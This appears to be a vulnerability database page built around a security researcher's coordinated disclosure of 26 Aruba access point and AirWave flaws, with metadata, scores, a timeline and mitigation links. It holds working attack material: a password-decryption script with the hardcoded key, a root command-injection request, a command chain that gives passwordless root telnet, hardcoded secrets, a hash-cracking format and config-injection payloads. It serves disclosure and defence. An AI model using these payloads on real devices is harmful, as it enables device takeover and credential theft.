Based on the vulnerability shown in #24 which potentially discloses the password hashes of AP user accounts, the implemented hashing algorithm was tested. CVE-2014-7299 describes the password hashes as "encrypted password hashes". The following line shows the mgmt-user configuration for the user "admin" with password "admin":
mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa
Some testing with various passwords and especially password lengths showed that the passwords are actually encrypted and not hashed (as hash algorithms produce the same length output for different length input):
f9ac59cd431e174fb07539a8a811a1aa # admin d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin
The encryption algorithm used for the above passwords turned out to be 3DES in CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded on the AP. Sampling of different Firmware versions confirmed that the key is identical for all available versions. The IV required for 3DES consists of 8 random bytes, and is stored as the first 8 byte of the encrypted password. The following Python script can be used to decrypt the above hashes:
import pyDes hashes = ( 'f9ac59cd431e174fb07539a8a811a1aa', # admin 'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin ) key = ( '\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92' '\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03' ) for h in hashes: d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00') print h, '=>', d.decrypt(h.decode('hex')[8:])
Mitigation
Aruba released three advisories, related to the issues reported here:
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt
Following the resolution advises given in those advisories is strongly recommended. These advisories are also available on the Aruba security bulletin:
http://www.arubanetworks.com/support-services/security-bulletins/
For the vulnerabilities related to PAPI, Aruba has made the following document available:
http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf
This doc gives several advises how to remediate the PAPI related vulnerabilities. An update fixing the issues is announced for Q3/2016. For further information there is also a discussion thread in Aruba's Airheads Community Forum:
http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840
Author
The vulnerabilities were discovered by Sven Blumenstein from Google Security Team.
Timeline
2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day disclosure deadline (2016/04/22). 2016/01/22 - Aruba acknowledges report and starts working on the issues. 2016/02/01 - Asking Aruba for ETA on detailed feedback. 2016/02/03 - Detailed feedback for all reported vulnerabilities received. 2016/02/16 - Answered several questions from the feedback, asked Aruba for patch ETA. 2016/02/29 - Pinged for patch ETA. 2016/03/08 - Pinged for patch ETA. 2016/03/12 - Received detailed list with approx. ETA for patch releases and current status. 2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. 2016/03/24 - Asked Aruba for exact patch release dates. 2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch update for 2016/04/30 (past 90 day deadline). 2016/04/14 - 14 day grace period for disclosure was granted, according to the disclosure policy. New disclosure date was set to 2016/05/06. 2016/05/02 - Asking for status of still unreleased 'end of April' update. 2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace period). 2016/05/03 - Aruba released three advisories on http://www.arubanetworks.com/support-services/security-bulletins/ 2016/05/06 - Public disclosure
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1251", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "aruba instant", "scope": "eq", "trust": 1.0, "vendor": "arubanetworks", "version": "4.2.3.1" }, { "model": "arubaos", "scope": "eq", "trust": 1.0, "vendor": "arubanetworks", "version": "*" }, { "model": "aruba instant", "scope": "lt", "trust": 1.0, "vendor": "arubanetworks", "version": "4.1.3.0" }, { "model": "airwave", "scope": "gte", "trust": 1.0, "vendor": "arubanetworks", "version": null }, { "model": "airwave", "scope": "lt", "trust": 1.0, "vendor": "arubanetworks", "version": "8.2.0.0" }, { "model": "airwave network management", "scope": null, "trust": 0.8, "vendor": "aruba", "version": null }, { "model": "instant", "scope": "eq", "trust": 0.8, "vendor": "aruba", "version": "4.1.3.0" }, { "model": "instant", "scope": "eq", "trust": 0.8, "vendor": "aruba", "version": "4.2.3.1" }, { "model": "arubaos", "scope": null, "trust": 0.8, "vendor": "aruba", "version": null }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.1.1" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.1.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.7" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.3" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.3.2" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.3.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.26" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.2.23" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.2.18" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.2.17" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.2.11" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.1.30" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.1.29" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.1.24" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.1" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "2.5.6.24" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "2.5.6.0" }, { "model": "networks arubaos rn3.1.12", "scope": null, "trust": 0.3, "vendor": "aruba", "version": null }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.1.4" }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.1.13" }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.1.1" }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.1.0.0" }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.1.0" }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "2.0" }, { "model": "networks arubaos rn", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "1.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "6.1.2.6" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "6.1.2.4" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "6.0.2.1" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "6.0.1.1" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "6.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "5.0.4.2" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "5.0.3.2" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "5.0.3.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "5.0.2.1" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "5.0.2.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "5.0.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.4.2" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.3.1" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.2.6" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.4.2.0" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.3.9" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.3.8" }, { "model": "networks arubaos", "scope": "eq", "trust": 0.3, "vendor": "aruba", "version": "3.3.3.10" } ], "sources": [ { "db": "BID", "id": "90207" }, { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "NVD", "id": "CVE-2016-2031" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.2.0.0", "versionStartIncluding": "", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.1.3.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:arubanetworks:aruba_instant:4.2.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2031" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sven Blumenstein from Google Security Team.", "sources": [ { "db": "BID", "id": "90207" }, { "db": "CNNVD", "id": "CNNVD-201607-362" } ], "trust": 0.9 }, "cve": "CVE-2016-2031", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2016-2031", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2016-009614", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-2031", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2016-009614", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2031", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2016-009614", "trust": 0.8, "value": "Critical" }, { "author": "CNNVD", "id": "CNNVD-201607-362", "trust": 0.6, "value": "CRITICAL" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "CNNVD", "id": "CNNVD-201607-362" }, { "db": "NVD", "id": "CVE-2016-2031" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code. Aruba Instant There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Multiple Arubanetworks Products are prone to multiple security vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. \nFollowing products and versions are affected:\nArubaOS (all versions) are vulnerable. \nAirWave Management Platform 8.x prior to 8.2 are vulnerable. \nAruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1) are vulnerable. The\nVulnerabilities were discovered during a black box security assessment and\ntherefore the vulnerability list should not be considered exhaustive. Several\nof the high severity vulnerabilities listed in this report are related to the\nAruba proprietary PAPI protocol and allow remote compromise of affected devices. AMP: RabbitMQ Management interface exposed\n 2. AMP: XSRF token uses weak calculation algorithm\n 3. AMP: Arbitrary modification of /etc/ntp.conf\n 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)\n 5. (I)AP: Insecure transmission of login credentials (GET)\n 6. (I)AP: Built in privileged \"support\" account\n 7. (I)AP: Static password hash for support account\n 8. (I)AP: Unusual account identified (\"arubasecretadmin\")\n 9. (I)AP: Privileged remote code execution\n10. (I)AP: Radius passwords allow arbitrary raddb commands\n11. (I)AP: Unauthenticated disclosure of environment variables\n12. (I)AP: Information disclosure by firmware checking functionality\n13. (I)AP: Unauthenticated automated firmware update requests\n14. (I)AP: Firmware updater does not check certificates\n15. (I)AP: Forceful downgrade of FW versions possible\n16. (I)AP: Firmware update check discloses machine certificate\n17. (I)AP: Firmware is downloaded via unencrypted connection\n18. (I)AP: Firmware update Challenge/Response does not protect the Client\n19. (I)AP: Unencrypted private keys and certs\n20. (I)AP: Potential signature private key\n21. (I)AP: PAPI Endpoints exposed to all interfaces\n22. (I)AP: PAPI Endpoint does not validate MD5 signatures\n23. (I)AP: PAPI protocol encrypted with weak encryption algorithm\n24. (I)AP: PAPI protocol authentication bypass\n25. (I)AP: Broadcast with detailed system information (LLDP)\n26. (I)AP: User passwords are encrypted with a static key\n\n\nVulnerability Details\n=====================\n\n---------------------------------------------\n1. AMP: RabbitMQ Management interface exposed\n---------------------------------------------\n\nAMPs expose the management frontend for the RabbitMQ message queue on all\ninterfaces via tcp/15672 and tcp/55672. \n\n # netstat -nltp | grep beam\n tcp 0 0 127.0.0.1:5672 0.0.0.0:*\n LISTEN 2830/beam.smp\n tcp 0 0 127.0.0.1:17716 0.0.0.0:*\n LISTEN 2830/beam.smp\n tcp 0 0 0.0.0.0:15672 0.0.0.0:*\n LISTEN 2830/beam.smp\n tcp 0 0 0.0.0.0:55672 0.0.0.0:*\n LISTEN 2830/beam.smp\n\nThe password for the default user \"airwave\" is stored in the world readable\nfile /etc/rabbitmq/rabbitmq.config in plaintext:\n\n # ls -l /etc/rabbitmq/rabbitmq.config\n -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config\n # grep default_ /etc/rabbitmq/rabbitmq.config\n {default_user,\u003c\u003c\"airwave\"\u003e\u003e},\n {default_pass,\u003c\u003c\"***REMOVED***\"\u003e\u003e}\n\n--------------------------------------------------\n2. AMP: XSRF token uses weak calculation algorithm\n--------------------------------------------------\n\nThe XSRF token is calculated based on limited sources of entropy, consisting of\nthe user\u0027s time of login and a random number between 0 and 99999. The algorithm\nIs approximated by the following example Python script:\n\n base64.b64encode(hashlib.md5(\u0027%d%5.5d\u0027 % (int(time.time()),\nrandom.randint(0,99999))).digest())\n\n\n-----------------------------------------------\n3. AMP: Arbitrary modification of /etc/ntp.conf\n-----------------------------------------------\n\nIncorrect/missing filtering of input parameters allows injecting new lines and\narbitrary commands into /etc/ntp.conf, when updating the NTP settings via the\nweb frontend. \n\n POST /nf/pref_network? HTTP/1.1\n Host: 192.168.131.162\n [...]\n\n id=\u0026ip_1=192.168.131.162\u0026hostname_1=foo.example.com\u0026\n subnet_mask_1=255.255.255.248\u0026gateway_1=192.168.131.161\u0026dns1_1=172.16.255.1\u0026\n dns2_1=\u0026eth1_enabled_1=0\u0026eth1_ip_1=\u0026eth1_netmask_1=\u0026\n ntp1_1=time1.example.com%0afoo\u0026ntp2_1=time2.example.com\u0026save=Save\n\nThe above POST requests results in the following ntp.conf being generated:\n\n # cat /etc/ntp.conf\n [...]\n server time1.example.com\n foo\n server time2.example.com\n\n------------------------------------------------------------------------------\n4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)\n------------------------------------------------------------------------------\n\nPAPI packets sent from an AP to an AMP are authenticated with a cryptographic\nchecksum. The packet format is only partially known, as it\u0027s a proprietary\nformat created by Aruba. A typical PAPI packet sent to an AMP is as follows:\n\n\n 0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........ \n 0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......\u003e.\"I.. \n 0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F... \n\n\nThe following dissection of the above shown packet gives a more detailed\noverview of the format:\n\n 49 72 ID\n 00 02 Version\n 64 69 86 2d PAPI Destination IP\n 7f 00 00 01 PAPI Source IP\n 01 00 Unknown1\n 01 00 Unknown2\n 20 1f PAPI Source Port\n 20 1e PAPI Destination Port\n 00 01 Unknown3\n 00 00 Unknown4\n 00 01 Sequence Number\n 3e f9 Unknown5\n 22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum\n\n\nThe checksum is based on a MD5 hash of a padded concatenation of all fields and\na secret token. The secret token is hardcoded in multiple binaries on the AMP\nand can easily be retrieved via core Linux system tools:\n\n $ strings /opt/airwave/bin/msgHandler | grep asd\n asdf;lkj763\n\nUsing this secret token it is possible to craft valid PAPI packets and issue\ncommands to the AMP, bypassing the authentication based on the shared\nsecret / token. This can be exploited to compromise of the device. \nRandom sampling of different software versions available on\nAruba\u0027s website confirmed that the shared secret is identical for all versions. \n\n-------------------------------------------------------\n5. AP: Insecure transmission of login credentials (GET)\n-------------------------------------------------------\n\nUsername and password to authenticate with the AP web frontend are transmitted\nthrough HTTP GET. This method should not be used in a form that transmits\nsensitive data, because the data is displayed in clear text in the URL. \n\n GET /swarm.cgi?opcode=login\u0026user=admin\u0026passwd=admin HTTP/1.1\n\nThe login URL can potentially appear in Proxy logs, the server logs or\nbrowser history. This possibly discloses the authentication data to\nunauthorized persons. \n\n--------------------------------------------\n6. AP: Built in privileged \"support\" account\n--------------------------------------------\n\nThe APs provide a built in system account called \"support\". When connected to\nthe restricted shell of the AP via SSH, issuing the command \"support\", triggers\na password request:\n\n\n 00:0b:86:XX:XX:XX# support\n Password:\n\nA quick internet search clarified, that this password is meant for use by Aruba\nengineers only:\nhttp://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760\n\nFurther research on that functionality lead to the conclusion that this\nfunctionality provides root-privileged shell access to the underlying operating\nsystem of the AP, given the correct password is entered. \n\n-----------------------------------------------\n7. AP: Static password hash for support account\n-----------------------------------------------\n\nThe password hash for the \"support\" account mentioned in vulnerability #6 is\nstored in plaintext on the AP. \n\n $ strings /aruba/bin/cli | grep ^bc5\n bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14\n\nRandom sampling of different versions of Firmware images available on Aruba\u0027s\nwebsite confirmed that the password hash is identical for all versions. The\npassword check validating a given \"support\" password is based on the following\nalgorithm:\n\n SALT + sha1(SALT + PASSWORD)\n\nWhere SALT equals the first 5 bytes of the password hash in binary\nrepresentation. It is possible to run a brute-force attack on this hash format\nusing JtR with the following input format:\n\n support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601\n\n------------------------------------------------------\n8. AP: Unusual account identified (\"arubasecretadmin\")\n------------------------------------------------------\n\nThe AP\u0027s system user configuration contains a undocumented account called\n\"arubasecretadmin\". This account was the root cause for CVE-2007-0932 and\nallowed administrative login with a static password. \n\n /etc/passwd:\n nobody:x:99:99:Nobody:/:/sbin/nologin\n root:x:0:0:Root:/:/bin/sh\n admin:x:100:100:Admin:/:/bin/telnet3\n arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2\n serial:x:102:100:Serial:/:/bin/telnet4\n\nFurther tests indicated that login with this account seems not possible as it\nis not mapped through Arubas authentication mechanisms. The reason for it being\nstill configured on the system is unknown. \n\n---------------------------------------\n9. AP: Privileged remote code execution\n---------------------------------------\n\nInsufficient checking of parameters allows an attacker to execute commands\nwith root privileges on the AP. The vulnerable parameter is \"image_url\" which\nis used in the Firmware update function. \n\n GET /swarm.cgi?opcode=image-url-upgrade\u0026ip=127.0.0.1\u0026oper_id=6\u0026image_url=Aries@http://10.0.0.1/?\"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`\"\u0026auto_reboot=false\u0026refresh=true\u0026sid=OWsiU5MM7DxVf9FRWe3P\u0026nocache=0.9368100591919084\nHTTP/1.1\n\nThe above example starts a new instance of mini_httpd on tcp/1234, which allows\nbrowsing the AP\u0027s filesystem. The following list of commands, if executed in\norder, start a telnet service that allows passwordless root login. \n\n killall -9 utelnetd\n touch /tmp/telnet_enable\n echo \\#\\!/bin/sh \u003e /bin/login\n echo /bin/sh \u003e\u003e /bin/login\n chmod +x /bin/login\n /sbin/utelnetd\n\nConnecting to the telnet service started by the above command chain:\n\n # telnet 10.0.XX.XX\n Trying 10.0.XX.XX... \n Connected to 10.0.XX.XX. \n Escape character is \u0027^]\u0027. \n Switching to Full Access\n /aruba/bin # echo $USER\n root\n /aruba/bin #\n\nPotential exploits of this vulnerability can be detected through the\nAP\u0027s log file:\n [...]\n Jan 1 02:43:47 cli[2052]: \u003c341004\u003e \u003cWARN\u003e |AP\n00:0b:86:XX:XX:XX2@10.0.XX.XX cli|\nhttp://10.0.XX.XX/?\"`/sbin/utelnetd`\"\n [...]\n\n-------------------------------------------------------\n10. AP: Radius passwords allow arbitrary raddb commands\n-------------------------------------------------------\n\nInsufficient checking of the GET parameter \"cmd\" allows the injection of\narbitrary commands and configuration parameters in the raddb configuration. \n\nExample:\n GET /swarm.cgi?opcode=config\u0026ip=127.0.0.1\u0026cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27\u0026refresh=false\u0026sid=Lppj9jT2xQmYKqjEx5eP\u0026nocache=0.10862623626107548\nHTTP/1.1\n\n /aruba/radius/raddb/users:\n foo Filter-Id == MAC-GUEST, Cleartext-Password := \"foo\",my-setting==\"blah\"\n\n\nAs shown in the above example, inserting a double-quote in the password allows\nto add additional commands after the password. \n\n-----------------------------------------------------------\n11. AP: Unauthenticated disclosure of environment variables\n-----------------------------------------------------------\n\nIt is possible to request a listing of environment variables by requesting a\nspecific URL on the AP\u0027s web server. The request does not require\nauthentication. \n\n GET /swarm.cgi?opcode=printenv HTTP/1.1\n\n HTTP/1.0 200 OK\n Content-Type:text/plain; charset=utf-8\n Pragma: no-cache\n Cache-Control: max-age=0, no-store\n\n Environment variables\n\n CHILD_INDEX=0\n PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin\n LD_LIBRARY_PATH=/usr/local/lib:/usr/lib\n SERVER_SOFTWARE=\n SERVER_NAME=10.0.XX.XX\n GATEWAY_INTERFACE=CGI/1.1\n SERVER_PROTOCOL=HTTP/1.0\n SERVER_PORT=4343\n REQUEST_METHOD=GET\n SCRIPT_NAME=/swarm.cgi\n QUERY_STRING=opcode=printenv\n REMOTE_ADDR=10.0.XX.XX\n REMOTE_PORT=58804\n HTTP_REFERER=https://10.0.XX.XX:4343/\n HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0)\nGecko/20100101 Firefox/38.0 Iceweasel/38.3.0\n HTTP_HOST=10.0.XX.XX:4343\n\n-----------------------------------------------------------------\n12. AP: Information disclosure by firmware checking functionality\n-----------------------------------------------------------------\n\nWhen the AP checks device.arubanetworks.com for a new firmware version, it\nsends detailed information of the AP in plaintext to the remote host. \n\n POST /firmware HTTP/1.1\n Host: device.arubanetworks.com\n Content-Length: 2\n Connection: keep-alive\n X-Type: firmware-check\n X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n X-OEM-Tag: Aruba\n X-Mode: IAP\n X-Factory-Default: Yes\n X-Current-Version: 6.4.2.6-4.1.1.10_51810\n X-Organization: ***REMOVED (Company Internal Name)***\n X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155\n X-Features: 0000100001001000000000000000000000000000000000010000000\n\n----------------------------------------------------------\n13. AP: Unauthenticated automated firmware update requests\n----------------------------------------------------------\n\nThe web frontend of the AP provides functionality to initiate an automated\nfirmware update. Doing so triggers the AP to initiate communication with\ndevice.arubanetworks.com and automatically download and install a new firmware\nimage. The CGI opcode for that automatic update is \"image-server-check\" and it\nwas discovered that the \"sid\" parameter is not checked for this opcode. Therefor\nan attacker can issue the automatic firmware update without authentication by\nsending the following GET request to the AP. \n\n GET /swarm.cgi?opcode=image-server-check\u0026ip=127.0.0.1\u0026sid=x\n\nAs shown above, the \"sid\" parameter has to be submitted as part of the URL, but\ncan be set to anything. Although all opcode actions follow the same calling\nscheme, \"image-server-check\" was the only opcode where the session ID was not\nvalidated. \n\nCombined with other vulnerabilities (#14, #15), this could be exploited to\ninstall an outdated, vulnerable firmware on the AP. \n\n----------------------------------------------------\n14. AP: Firmware updater does not check certificates\n----------------------------------------------------\n\nThe communication between AP and device.arubanetworks.com is secured by using\nSSL. The AP does not do proper certificate validation for the communication to\ndevice.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a\nself-signed certificate allowed interception of the traffic between AP and\ndevice.arubanetworks.com. \n\n--------------------------------------------------\n15. AP: Forceful downgrade of FW versions possible\n--------------------------------------------------\n\nWhen checking device.arubanetworks.com for a new firmware image, the AP sends\nit\u0027s current version to the remote host. If there is no new firmware available,\ndevice.arubanetworks.com does not provide any download options. If the initial\nversion sent from the AP is modified by an attacker (via MiTM), the remote\nserver will reply with the current firmware version. The AP will then reject\nthat firmware, as it\u0027s current version is more recent/the same. Downgrading the\nversion does also not work based on the validation the AP does. \nThis behaviour can be overwritten if an attacker intercepts and modifies the\nreply from device.arubanetworks.com and adds X-header called\n\"X-Mandatory-Upgrade\". \n\nExample of a spoofed reply from 